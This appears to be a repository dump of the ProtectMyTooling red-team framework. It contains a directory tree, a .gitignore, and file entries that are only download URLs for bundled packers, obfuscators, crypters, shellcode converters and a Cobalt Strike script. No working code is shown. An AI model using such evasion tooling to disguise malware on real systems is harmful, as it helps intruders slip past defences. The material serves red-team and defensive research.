├── .gitignore
├── CobaltStrike
├── ProtectMyTooling.cna
└── cobaltProtectMyTooling.py
├── ProtectMyTooling.py
├── ProtectMyToolingGUI.pyw
├── README.md
├── RedBackdoorer.py
├── RedWatermarker.py
├── config
├── ProtectMyTooling.yaml
└── sample-full-config.yaml
├── contrib
├── AsStrongAsFuck
│ └── AsStrongAsFuck.exe
├── AtomPePacker
│ ├── Hasher.exe
│ ├── Modules
│ │ ├── DllPP64Stub.dll
│ │ └── PP64Stub.exe
│ └── PePacker.exe
├── CallObf
│ ├── cobf64.exe
│ └── cobf86.exe
├── ConfuserEx
│ ├── active-mkaring
│ │ ├── CommonServiceLocator.dll
│ │ ├── Confuser.CLI.exe
│ │ ├── Confuser.CLI.exe.config
│ │ ├── Confuser.Core.dll
│ │ ├── Confuser.DynCipher.dll
│ │ ├── Confuser.Protections.dll
│ │ ├── Confuser.Renamer.dll
│ │ ├── Confuser.Runtime.dll
│ │ ├── ConfuserEx.exe
│ │ ├── ConfuserEx.exe.config
│ │ ├── GalaSoft.MvvmLight.Extras.dll
│ │ ├── GalaSoft.MvvmLight.Platform.dll
│ │ ├── GalaSoft.MvvmLight.dll
│ │ ├── Microsoft.DiaSymReader.Native.amd64.dll
│ │ ├── Microsoft.DiaSymReader.Native.x86.dll
│ │ ├── Microsoft.Win32.Registry.dll
│ │ ├── NDesk.Options.dll
│ │ ├── Ookii.Dialogs.Wpf.dll
│ │ ├── System.IO.FileSystem.Primitives.dll
│ │ ├── System.IO.Packaging.dll
│ │ ├── System.Security.AccessControl.dll
│ │ ├── System.Security.Principal.Windows.dll
│ │ ├── System.ValueTuple.dll
│ │ ├── System.Windows.Interactivity.dll
│ │ └── dnlib.dll
│ └── original
│ │ ├── CommonServiceLocator.dll
│ │ ├── Confuser.CLI.exe
│ │ ├── Confuser.CLI.exe.config
│ │ ├── Confuser.Core.dll
│ │ ├── Confuser.DynCipher.dll
│ │ ├── Confuser.Protections.dll
│ │ ├── Confuser.Renamer.dll
│ │ ├── Confuser.Runtime.dll
│ │ ├── ConfuserEx.exe
│ │ ├── ConfuserEx.exe.config
│ │ ├── GalaSoft.MvvmLight.Extras.dll
│ │ ├── GalaSoft.MvvmLight.Platform.dll
│ │ ├── GalaSoft.MvvmLight.dll
│ │ ├── Microsoft.DiaSymReader.Native.amd64.dll
│ │ ├── Microsoft.DiaSymReader.Native.x86.dll
│ │ ├── Microsoft.Win32.Registry.dll
│ │ ├── NDesk.Options.dll
│ │ ├── Ookii.Dialogs.Wpf.dll
│ │ ├── System.IO.FileSystem.Primitives.dll
│ │ ├── System.IO.Packaging.dll
│ │ ├── System.Security.AccessControl.dll
│ │ ├── System.Security.Principal.Windows.dll
│ │ ├── System.ValueTuple.dll
│ │ ├── System.Windows.Interactivity.dll
│ │ └── dnlib.dll
├── Hyperion
│ ├── Fasm
│ │ ├── INCLUDE
│ │ │ ├── API
│ │ │ │ ├── ADVAPI32.INC
│ │ │ │ ├── COMCTL32.INC
│ │ │ │ ├── COMDLG32.INC
│ │ │ │ ├── GDI32.INC
│ │ │ │ ├── KERNEL32.INC
│ │ │ │ ├── SHELL32.INC
│ │ │ │ ├── USER32.INC
│ │ │ │ └── WSOCK32.INC
│ │ │ ├── ENCODING
│ │ │ │ ├── UTF8.INC
│ │ │ │ ├── WIN1250.INC
│ │ │ │ ├── WIN1251.INC
│ │ │ │ ├── WIN1252.INC
│ │ │ │ ├── WIN1253.INC
│ │ │ │ ├── WIN1254.INC
│ │ │ │ ├── WIN1255.INC
│ │ │ │ ├── WIN1256.INC
│ │ │ │ ├── WIN1257.INC
│ │ │ │ ├── WIN1258.INC
│ │ │ │ └── WIN874.INC
│ │ │ ├── EQUATES
│ │ │ │ ├── COMCTL32.INC
│ │ │ │ ├── COMCTL64.INC
│ │ │ │ ├── COMDLG32.INC
│ │ │ │ ├── COMDLG64.INC
│ │ │ │ ├── GDI32.INC
│ │ │ │ ├── GDI64.INC
│ │ │ │ ├── KERNEL32.INC
│ │ │ │ ├── KERNEL64.INC
│ │ │ │ ├── SHELL32.INC
│ │ │ │ ├── SHELL64.INC
│ │ │ │ ├── USER32.INC
│ │ │ │ ├── USER64.INC
│ │ │ │ └── WSOCK32.INC
│ │ │ ├── MACRO
│ │ │ │ ├── COM32.INC
│ │ │ │ ├── COM64.INC
│ │ │ │ ├── EXPORT.INC
│ │ │ │ ├── IF.INC
│ │ │ │ ├── IMPORT32.INC
│ │ │ │ ├── IMPORT64.INC
│ │ │ │ ├── MASM.INC
│ │ │ │ ├── PROC32.INC
│ │ │ │ ├── PROC64.INC
│ │ │ │ ├── RESOURCE.INC
│ │ │ │ └── STRUCT.INC
│ │ │ ├── PCOUNT
│ │ │ │ ├── ADVAPI32.INC
│ │ │ │ ├── COMCTL32.INC
│ │ │ │ ├── COMDLG32.INC
│ │ │ │ ├── GDI32.INC
│ │ │ │ ├── KERNEL32.INC
│ │ │ │ ├── SHELL32.INC
│ │ │ │ ├── USER32.INC
│ │ │ │ └── WSOCK32.INC
│ │ │ ├── WIN32A.INC
│ │ │ ├── WIN32AX.INC
│ │ │ ├── WIN32AXP.INC
│ │ │ ├── WIN32W.INC
│ │ │ ├── WIN32WX.INC
│ │ │ ├── WIN32WXP.INC
│ │ │ ├── WIN64A.INC
│ │ │ ├── WIN64AX.INC
│ │ │ ├── WIN64AXP.INC
│ │ │ ├── WIN64W.INC
│ │ │ ├── WIN64WX.INC
│ │ │ └── WIN64WXP.INC
│ │ ├── fasm.exe
│ │ └── license.TXT
│ ├── Src
│ │ ├── Container
│ │ │ ├── 32
│ │ │ │ ├── createstrings.inc
│ │ │ │ ├── hyperion.inc
│ │ │ │ ├── loadapis.asm
│ │ │ │ ├── loadexecutable.asm
│ │ │ │ ├── logfile_disable.asm
│ │ │ │ ├── logfile_enable.asm
│ │ │ │ ├── main.asm
│ │ │ │ └── pe.inc
│ │ │ └── 64
│ │ │ │ ├── decryption_payload.asm
│ │ │ │ ├── image_base.inc
│ │ │ │ ├── image_size.inc
│ │ │ │ ├── infile_array.inc
│ │ │ │ ├── infile_size.inc
│ │ │ │ ├── key_size.inc
│ │ │ │ ├── loadexecutable.asm
│ │ │ │ ├── logfile_disable.asm
│ │ │ │ ├── logfile_enable.asm
│ │ │ │ ├── logfile_select.asm
│ │ │ │ ├── main.asm
│ │ │ │ ├── main_prolog.inc
│ │ │ │ └── pe.inc
│ │ ├── Crypter
│ │ │ ├── aes.c
│ │ │ ├── aes.o
│ │ │ ├── encryption.c
│ │ │ ├── encryption.o
│ │ │ ├── fasmoutput.c
│ │ │ ├── fasmoutput.h
│ │ │ ├── fasmoutput.o
│ │ │ ├── fileaccess.c
│ │ │ ├── fileaccess.o
│ │ │ ├── hyperion.c
│ │ │ ├── hyperion.h
│ │ │ ├── hyperion.o
│ │ │ ├── pe.h
│ │ │ ├── pe32.c
│ │ │ ├── pe32.o
│ │ │ ├── pe64.c
│ │ │ ├── pe64.o
│ │ │ ├── pe_general.c
│ │ │ ├── pe_general.o
│ │ │ ├── secure_string.c
│ │ │ ├── secure_string.o
│ │ │ ├── verbose.c
│ │ │ └── verbose.o
│ │ └── Payloads
│ │ │ └── Aes
│ │ │ ├── 32
│ │ │ ├── aes.asm
│ │ │ ├── aes.inc
│ │ │ ├── aes_constants_intern.inc
│ │ │ ├── decryptexecutable.asm
│ │ │ ├── decryptionrounds.asm
│ │ │ ├── encryptionrounds.asm
│ │ │ ├── galois.asm
│ │ │ ├── keychain.asm
│ │ │ ├── license.txt
│ │ │ ├── rcon.asm
│ │ │ └── sbox.asm
│ │ │ ├── 64
│ │ │ ├── aes.asm
│ │ │ ├── aes.inc
│ │ │ ├── aes_constants_intern.inc
│ │ │ ├── decryptexecutable.asm
│ │ │ ├── decryptionrounds.asm
│ │ │ ├── encryptionrounds.asm
│ │ │ ├── galois.asm
│ │ │ ├── keychain.asm
│ │ │ ├── license.txt
│ │ │ ├── rcon.asm
│ │ │ └── sbox.asm
│ │ │ └── c
│ │ │ ├── aes.c
│ │ │ ├── aes.h
│ │ │ ├── aes.o
│ │ │ └── unlicense.txt
│ ├── hyperion.exe
│ ├── license.txt
│ └── readme.txt
├── Invoke-Obfuscation
│ ├── Invoke-Obfuscation.ps1
│ ├── Invoke-Obfuscation.psd1
│ ├── Invoke-Obfuscation.psm1
│ ├── LICENSE
│ ├── Out-CompressedCommand.ps1
│ ├── Out-EncodedAsciiCommand.ps1
│ ├── Out-EncodedBXORCommand.ps1
│ ├── Out-EncodedBinaryCommand.ps1
│ ├── Out-EncodedHexCommand.ps1
│ ├── Out-EncodedOctalCommand.ps1
│ ├── Out-EncodedSpecialCharOnlyCommand.ps1
│ ├── Out-EncodedWhitespaceCommand.ps1
│ ├── Out-ObfuscatedAst.ps1
│ ├── Out-ObfuscatedStringCommand.ps1
│ ├── Out-ObfuscatedTokenCommand.ps1
│ ├── Out-PowerShellLauncher.ps1
│ ├── Out-SecureStringCommand.ps1
│ └── README.md
├── LoGIC.NET
│ ├── LoGiC.NET.exe
│ ├── LoGiC.NET.exe.config
│ ├── SharpConfigParser.dll
│ ├── dnlib.dll
│ └── dnlib.xml
├── MPRESS
│ ├── BugReport.txt
│ ├── FAQ.TXT
│ ├── History.txt
│ ├── license.txt
│ └── mpress.exe
├── Mangle
│ ├── Mangle.exe
│ ├── sigcheck.exe
│ └── signed-executables
│ │ ├── WINWORD.EXE
│ │ ├── autorunsc64.exe
│ │ ├── notepad.exe
│ │ └── svchost.exe
├── NimPackt-v1
│ ├── LICENSE
│ ├── NimPackt.cna
│ ├── NimPackt.py
│ ├── NimPackt.yar
│ ├── README.md
│ ├── assets
│ │ ├── AntiScan-Results-CSBeacon.png
│ │ ├── Nimpackt-Logo-Blacktext.png
│ │ └── cna_plugin.png
│ ├── dist
│ │ └── shellycoat_x64.bin
│ └── templates
│ │ ├── NimPackt-Template.nim
│ │ └── syscalls.nim
├── Nimcrypt2
│ ├── GetSyscallStub.nim
│ ├── LICENSE
│ ├── README.md
│ ├── nimcrypt.exe
│ ├── nimcrypt.nim
│ └── syscalls.nim
├── PEunion
│ ├── Config
│ │ ├── recent.ini
│ │ ├── rtlo_extension_alternatives.ini
│ │ └── viewstate.ini
│ ├── FASM
│ │ ├── FASM.EXE
│ │ └── INCLUDE
│ │ │ ├── API
│ │ │ ├── ADVAPI32.INC
│ │ │ ├── COMCTL32.INC
│ │ │ ├── COMDLG32.INC
│ │ │ ├── GDI32.INC
│ │ │ ├── KERNEL32.INC
│ │ │ ├── SHELL32.INC
│ │ │ ├── USER32.INC
│ │ │ └── WSOCK32.INC
│ │ │ ├── ENCODING
│ │ │ ├── UTF8.INC
│ │ │ ├── WIN1250.INC
│ │ │ ├── WIN1251.INC
│ │ │ ├── WIN1252.INC
│ │ │ ├── WIN1253.INC
│ │ │ ├── WIN1254.INC
│ │ │ ├── WIN1255.INC
│ │ │ ├── WIN1256.INC
│ │ │ ├── WIN1257.INC
│ │ │ ├── WIN1258.INC
│ │ │ └── WIN874.INC
│ │ │ ├── EQUATES
│ │ │ ├── COMCTL32.INC
│ │ │ ├── COMCTL64.INC
│ │ │ ├── COMDLG32.INC
│ │ │ ├── COMDLG64.INC
│ │ │ ├── GDI32.INC
│ │ │ ├── GDI64.INC
│ │ │ ├── KERNEL32.INC
│ │ │ ├── KERNEL64.INC
│ │ │ ├── SHELL32.INC
│ │ │ ├── SHELL64.INC
│ │ │ ├── USER32.INC
│ │ │ ├── USER64.INC
│ │ │ └── WSOCK32.INC
│ │ │ ├── MACRO
│ │ │ ├── COM32.INC
│ │ │ ├── COM64.INC
│ │ │ ├── EXPORT.INC
│ │ │ ├── IF.INC
│ │ │ ├── IMPORT32.INC
│ │ │ ├── IMPORT64.INC
│ │ │ ├── MASM.INC
│ │ │ ├── PROC32.INC
│ │ │ ├── PROC64.INC
│ │ │ ├── RESOURCE.INC
│ │ │ └── STRUCT.INC
│ │ │ ├── PCOUNT
│ │ │ ├── ADVAPI32.INC
│ │ │ ├── COMCTL32.INC
│ │ │ ├── COMDLG32.INC
│ │ │ ├── GDI32.INC
│ │ │ ├── KERNEL32.INC
│ │ │ ├── SHELL32.INC
│ │ │ ├── USER32.INC
│ │ │ └── WSOCK32.INC
│ │ │ ├── WIN32A.INC
│ │ │ ├── WIN32AX.INC
│ │ │ ├── WIN32AXP.INC
│ │ │ ├── WIN32W.INC
│ │ │ ├── WIN32WX.INC
│ │ │ ├── WIN32WXP.INC
│ │ │ ├── WIN64A.INC
│ │ │ ├── WIN64AX.INC
│ │ │ ├── WIN64AXP.INC
│ │ │ ├── WIN64W.INC
│ │ │ ├── WIN64WX.INC
│ │ │ └── WIN64WXP.INC
│ ├── Help
│ │ ├── App
│ │ │ └── Changelog.md
│ │ ├── Default.md
│ │ ├── Project
│ │ │ ├── Items
│ │ │ │ ├── Drop.md
│ │ │ │ ├── Invoke.md
│ │ │ │ ├── MessageBox.md
│ │ │ │ ├── RunPE.md
│ │ │ │ └── Source.md
│ │ │ ├── Manifest.md
│ │ │ ├── StartupMelt.md
│ │ │ ├── StubIcon.md
│ │ │ ├── StubPadding.md
│ │ │ ├── StubType.md
│ │ │ └── VersionInfo.md
│ │ ├── Rtlo
│ │ │ ├── Icon.md
│ │ │ ├── NewFilename.md
│ │ │ ├── OriginalFile.md
│ │ │ └── Preview.md
│ │ └── Template.html
│ ├── LICENSE-3RD-PARTY.md
│ ├── LICENSE.md
│ ├── PEunion.exe
│ ├── PEunion.exe.config
│ ├── Stub
│ │ ├── dotnet
│ │ │ ├── Api.cs
│ │ │ ├── Compression.cs
│ │ │ ├── Download.cs
│ │ │ ├── Drop.cs
│ │ │ ├── Emulator.cs
│ │ │ ├── GetResource.cs
│ │ │ ├── Invoke.cs
│ │ │ ├── Resources
│ │ │ │ ├── default.manifest
│ │ │ │ └── elevated.manifest
│ │ │ ├── RunPE.cs
│ │ │ ├── Stage2.cs
│ │ │ └── Stub.cs
│ │ └── pe32
│ │ │ ├── Api
│ │ │ ├── kernel32.inc
│ │ │ ├── msvcrt.inc
│ │ │ └── shlwapi.inc
│ │ │ ├── Compression.asm
│ │ │ ├── Download.asm
│ │ │ ├── Drop.asm
│ │ │ ├── Emulator.asm
│ │ │ ├── Melt.asm
│ │ │ ├── Obfuscator
│ │ │ ├── nop.txt
│ │ │ ├── nop_minimal.txt
│ │ │ └── register.txt
│ │ │ ├── PebApi.asm
│ │ │ ├── PebApi.inc
│ │ │ ├── Resources
│ │ │ ├── default.manifest
│ │ │ └── elevated.manifest
│ │ │ ├── RunPE.asm
│ │ │ ├── Stage2.asm
│ │ │ ├── Stub.asm
│ │ │ └── nt.inc
│ ├── lib
│ │ ├── BytecodeApi.FileFormats.dll
│ │ ├── BytecodeApi.FileIcons.dll
│ │ ├── BytecodeApi.UI.dll
│ │ ├── BytecodeApi.dll
│ │ ├── HtmlRenderer.WPF.dll
│ │ ├── HtmlRenderer.dll
│ │ ├── MarkdownSharp.dll
│ │ └── PEunion.Compiler.dll
│ ├── peubuild.exe
│ └── peubuild.exe.config
├── ScareCrow
│ ├── ScareCrow
│ ├── ScareCrow.exe
│ ├── libcrypto-3-x64.dll
│ ├── libcurl.dll
│ ├── libssl-3-x64.dll
│ ├── osslsigncode
│ └── osslsigncode.exe
├── _project-files
│ ├── CallObf
│ │ └── configExample.ini
│ ├── ConfuserEx
│ │ ├── beds-maximum.crproj
│ │ ├── maximum.crproj
│ │ ├── mkaring-maximum.crproj
│ │ └── neo-maximum.crproj
│ ├── PEunion
│ │ ├── dotnet64.peu
│ │ ├── dotnet86.peu
│ │ └── native86.peu
│ ├── enigma-projects
│ │ └── full-x86-1.enigma
│ ├── netreactor-projects
│ │ └── net-reactor-full1.nrproj
│ ├── smartassembly-projects
│ │ └── full1.saproj
│ ├── themida-projects
│ │ └── advanced-tiger-red.tmd
│ ├── vmprotect-projects
│ │ └── full-vmprotect.vmp
│ └── vmprotect
│ │ └── full-vmprotect.vmp
├── amber
│ ├── LICENSE
│ ├── amber.exe
│ └── keystone.dll
├── denim
│ └── denim.exe
├── donut
│ └── donut.exe
├── exiftool.exe
├── packer64
│ ├── Packer.exe
│ └── PackerStub.exe
├── pe2shc
│ ├── injector32.exe
│ ├── injector64.exe
│ ├── pe2shc.exe
│ ├── runshc32.exe
│ └── runshc64.exe
├── peCloakCapstone
│ ├── README.md
│ ├── SectionDoubleP.py
│ ├── SectionDoubleP.pyc
│ └── peCloak.py
├── pe_tools
│ ├── LICENSE
│ ├── README.md
│ ├── VERSION
│ ├── pe_tools
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ └── peresed.cpython-310.pyc
│ │ ├── pe_parser.py
│ │ ├── peresed.py
│ │ ├── rsrc.py
│ │ ├── struct3.py
│ │ ├── utils.py
│ │ └── version_info.py
│ └── setup.py
├── sRDI
│ ├── ConvertToShellcode.py
│ ├── Python.pyproj
│ └── ShellcodeRDI.py
├── sgn
│ ├── LICENSE
│ ├── keystone.dll
│ └── sgn.exe
└── upx
│ ├── upx-3.96-amd64_linux
│ ├── README
│ ├── README.1ST
│ ├── upx
│ ├── upx.1
│ └── upx.doc
│ ├── upx-3.96-i386_linux
│ ├── README
│ ├── README.1ST
│ ├── upx
│ ├── upx.1
│ └── upx.doc
│ ├── upx-3.96-win32
│ ├── README
│ ├── README.1ST
│ ├── upx.1
│ ├── upx.doc
│ └── upx.exe
│ └── upx-3.96-win64
│ ├── README
│ ├── README.1ST
│ ├── THANKS
│ ├── upx.1
│ ├── upx.doc
│ └── upx.exe
├── data
├── all-functions.txt
└── dodgy-functions.txt
├── images
├── 1.png
├── 3.png
├── 4.png
├── 5.png
└── options.png
├── install.ps1
├── install.sh
├── lib
├── __init__.py
├── logger.py
├── optionsparser.py
├── packersloader.py
└── utils.py
├── packers
├── IPacker.py
├── __init__.py
├── amber.py
├── asstrongasfuck.py
├── atompepacker.py
├── backdoor.py
├── callobf.py
├── confuserex.py
├── donut-packer.py
├── enigma.py
├── freeze.py
├── hyperion.py
├── intellilock.py
├── invobf.py
├── logicnet.py
├── mangle.py
├── mpress.py
├── netreactor.py
├── netshrink.py
├── nimcrypt2.py
├── nimpackt.py
├── nimsyscall.py
├── packer64.py
├── pe2shc.py
├── pecloak.py
├── peresed.py
├── peunion.py
├── scarecrow.py
├── sgn.py
├── smartassembly.py
├── srdi.py
├── themida.py
├── upx.py
└── vmprotect.py
└── requirements.txt
/.gitignore:
--------------------------------------------------------------------------------
1 | !contrib/_project-files
2 | !contrib/AsStrongAsFuck
3 | !contrib/AtomPePacker
4 | !contrib/callobf
5 | !contrib/ConfuserEx
6 | !contrib/denim
7 | !contrib/exiftool.exe
8 | !contrib/Hyperion
9 | !contrib/Invoke-Obfuscation
10 | !contrib/Freeze
11 | !contrib/Mangle
12 | !contrib/LoGIC.NET
13 | !contrib/MPRESS
14 | !contrib/Nimcrypt2
15 | !contrib/NimPackt-v1
16 | !contrib/packer64
17 | !contrib/pe_tools
18 | !contrib/peCloakCapstone
19 | !contrib/project-files/
20 | !contrib/smartassembly-projects
21 | !contrib/sRDI
22 | !contrib/upx
23 | !contrib/vmprotect-projects
24 | *.pyc
25 | /CobaltStrike/cobaltProtectMyTooling.conf
26 | /notes.txt
27 | contrib/*
28 | tests/*
29 |
--------------------------------------------------------------------------------
/contrib/AsStrongAsFuck/AsStrongAsFuck.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AsStrongAsFuck/AsStrongAsFuck.exe
--------------------------------------------------------------------------------
/contrib/AtomPePacker/Hasher.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/Hasher.exe
--------------------------------------------------------------------------------
/contrib/AtomPePacker/Modules/DllPP64Stub.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/Modules/DllPP64Stub.dll
--------------------------------------------------------------------------------
/contrib/AtomPePacker/Modules/PP64Stub.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/Modules/PP64Stub.exe
--------------------------------------------------------------------------------
/contrib/AtomPePacker/PePacker.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/PePacker.exe
--------------------------------------------------------------------------------
/contrib/CallObf/cobf64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/CallObf/cobf64.exe
--------------------------------------------------------------------------------
/contrib/CallObf/cobf86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/CallObf/cobf86.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/CommonServiceLocator.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/CommonServiceLocator.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.CLI.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.CLI.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.CLI.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Core.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Core.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.DynCipher.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.DynCipher.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Protections.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Protections.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Renamer.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Renamer.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Runtime.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Runtime.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/ConfuserEx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/ConfuserEx.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/ConfuserEx.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Extras.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Extras.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Platform.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Platform.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.amd64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.amd64.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.x86.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Microsoft.Win32.Registry.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Microsoft.Win32.Registry.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/NDesk.Options.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Ookii.Dialogs.Wpf.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Ookii.Dialogs.Wpf.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.IO.FileSystem.Primitives.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.IO.FileSystem.Primitives.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.IO.Packaging.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.IO.Packaging.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.Security.AccessControl.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.Security.AccessControl.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.Security.Principal.Windows.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.Security.Principal.Windows.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.ValueTuple.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.ValueTuple.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.Windows.Interactivity.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.Windows.Interactivity.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/dnlib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/dnlib.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/CommonServiceLocator.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/CommonServiceLocator.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.CLI.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.CLI.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.CLI.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
